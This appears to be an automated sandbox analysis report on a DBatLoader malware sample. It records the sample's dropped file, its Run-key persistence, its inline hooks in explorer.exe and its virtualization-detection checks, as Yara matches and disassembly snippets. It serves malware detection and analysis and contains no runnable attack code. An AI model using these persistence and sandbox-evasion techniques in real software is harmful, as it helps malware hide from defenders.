              Source: Binary string: easinvoker.pdbH source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: Fpopgapwdcgvxn.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.31a77bc.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.Telragab.PIF.313bc90.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.Fpopgapwdcgvxn.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Fpopgapwdcgvxn.exe.32b0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: C:\Users\Public\Libraries\Telragab.PIF, type: DROPPED
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A8272 push esp; iretd 0_3_026A8284
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A7473 push ecx; ret 0_3_026A7476
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A7627 push ebp; iretd 0_3_026A7628
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A7230 push ebp; iretd 0_3_026A728C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A821E push esp; iretd 0_3_026A822F
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A74C9 push ebp; iretd 0_3_026A74CA
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A3CCC push ss; ret 0_3_026A3CD6
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A7494 push ecx; ret 0_3_026A749D
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A6B4A push ebp; iretd 0_3_026A6B6A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A2B42 pushad ; retf 0_3_026A2B66
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A7D0E push esp; iretd 0_3_026A7D0F
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A81FE push esp; iretd 0_3_026A820B
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A81F2 push esp; iretd 0_3_026A81F7
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A39D3 pushad ; iretd 0_3_026A39D4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A81AF push esp; iretd 0_3_026A81F0
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_026A81AF push esp; iretd 0_3_026A81FC
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AC60C push edi; ret 0_3_031AC610
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031A9300 push ecx; ret 0_3_031A9303
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031ABF06 push edi; iretd 0_3_031ABF6A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AA03C push esp; iretd 0_3_031AA07D
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AA03C push esp; iretd 0_3_031AA089
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AC520 push edi; ret 0_3_031AC571
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031A9321 push ecx; ret 0_3_031A932A
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031A9356 push ebp; iretd 0_3_031A9357
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AB457 pushfd ; retf 0_3_031AB458
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AC57A push edi; ret 0_3_031AC581
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AA07F push esp; iretd 0_3_031AA084
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AC572 push edi; ret 0_3_031AC571
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AC572 push edi; ret 0_3_031AC579
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031A9B9B push esp; iretd 0_3_031A9B9C
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_3_031AB39F pushfd ; retf 0_3_031AB3A5
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032F7040 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_032F7040

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeFile created: C:\Users\Public\Libraries\Telragab.PIFJump to dropped file
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeFile created: C:\Users\Public\Libraries\Telragab.PIFJump to dropped file
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TelragabJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TelragabJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEE
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032F2264 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_032F2264
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032DAEB8 IsIconic,GetWindowPlacement,GetWindowRect,0_2_032DAEB8
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_033031B4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_033031B4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032F1030 IsIconic,GetCapture,0_2_032F1030
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032F1938 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_032F1938
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_033039A8 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,0_2_033039A8
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_033038E4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,0_2_033038E4
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032FFCF0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,0_2_032FFCF0
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_03308838 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_03308838
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000068B9904 second address: 00000000068B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000068B9B6E second address: 00000000068B9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000719904 second address: 000000000071990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000719B6E second address: 0000000000719B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000065F9904 second address: 00000000065F990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000065F9B6E second address: 00000000065F9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004D19904 second address: 0000000004D1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004D19B6E second address: 0000000004D19B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Allocates many large memory junks
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2F70000 memory commit 240005120
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2F71000 memory commit 240427008
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2FD9000 memory commit 240005120
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2FDA000 memory commit 240078848
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 2FED000 memory commit 241016832
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 30E5000 memory commit 240013312
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 30E8000 memory commit 240029696
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 32B0000 memory commit 280006656Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 32B1000 memory commit 280424448Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 3319000 memory commit 280002560Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 331A000 memory commit 280076288Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 332D000 memory commit 281018368Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 3425000 memory commit 280014848Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeMemory allocated: 3428000 memory commit 280031232Jump to behavior
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 3280000 memory commit 260005888
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 3281000 memory commit 260423680
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 32E9000 memory commit 260005888
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 32EA000 memory commit 260079616
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 32FD000 memory commit 261017600
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 33F5000 memory commit 260014080
              Source: C:\Users\Public\Libraries\Telragab.PIFMemory allocated: 33F8000 memory commit 260030464
              Source: C:\Windows\explorer.exe TID: 2036Thread sleep time: -16654000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 2036Thread sleep time: -3228000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep count: 176 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep time: -352000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep count: 9793 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156Thread sleep time: -19586000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8327Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1614Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 594Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9793Jump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeAPI coverage: 7.8 %
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 1.6 %
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_068B9AA0 rdtsc 3_2_068B9AA0
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_03302474
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeAPI call chain: ExitProcess graph end nodegraph_0-43037
              Source: explorer.exe, 00000005.00000003.2979477357.000000000C4EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}erPoint.Template.8\CLSIDS@5
              Source: explorer.exe, 00000005.00000000.2334366335.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
              Source: explorer.exe, 00000005.00000002.4623300730.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000005.00000000.2334366335.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
              Source: Telragab.PIF, 00000009.00000003.2578378839.0000000000770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
              Source: explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
              Source: explorer.exe, 00000005.00000002.4623300730.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000844000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2334366335.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4623300730.000000000978C000.00000004.00000001.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000770000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 00000009.00000003.2578378839.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.0000000000978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
              Source: explorer.exe, 00000005.00000003.2980040926.000000000C24C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000005.00000000.2327459707.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
              Source: Fpopgapwdcgvxn.exe, 00000000.00000003.2317987544.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Telragab.PIF, 0000000B.00000002.2686612744.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000005.00000003.2979054042.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: explorer.exe, 00000005.00000000.2324160077.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032B5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5C18
              Source: C:\Users\user\Desktop\Fpopgapwdcgvxn.exeCode function: 0_2_032F7040 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_032F7040
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E62BE78 mov ecx, dword ptr fs:[00000030h]3_2_1E62BE78
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E645E40 mov eax, dword ptr fs:[00000030h]3_2_1E645E40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6EDE46 mov eax, dword ptr fs:[00000030h]3_2_1E6EDE46
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BE51 mov eax, dword ptr fs:[00000030h]3_2_1E66BE51
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BE51 mov eax, dword ptr fs:[00000030h]3_2_1E66BE51
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E6D9E56 mov ecx, dword ptr fs:[00000030h]3_2_1E6D9E56
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DE2D mov eax, dword ptr fs:[00000030h]3_2_1E64DE2D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DE2D mov eax, dword ptr fs:[00000030h]3_2_1E64DE2D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E64DE2D mov eax, dword ptr fs:[00000030h]3_2_1E64DE2D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631E30 mov eax, dword ptr fs:[00000030h]3_2_1E631E30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E631E30 mov eax, dword ptr fs:[00000030h]3_2_1E631E30
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703E10 mov eax, dword ptr fs:[00000030h]3_2_1E703E10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E703E10 mov eax, dword ptr fs:[00000030h]3_2_1E703E10
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 3_2_1E66BE17 mov eax, dword ptr fs:[00000030h]3_2_1E66BE17
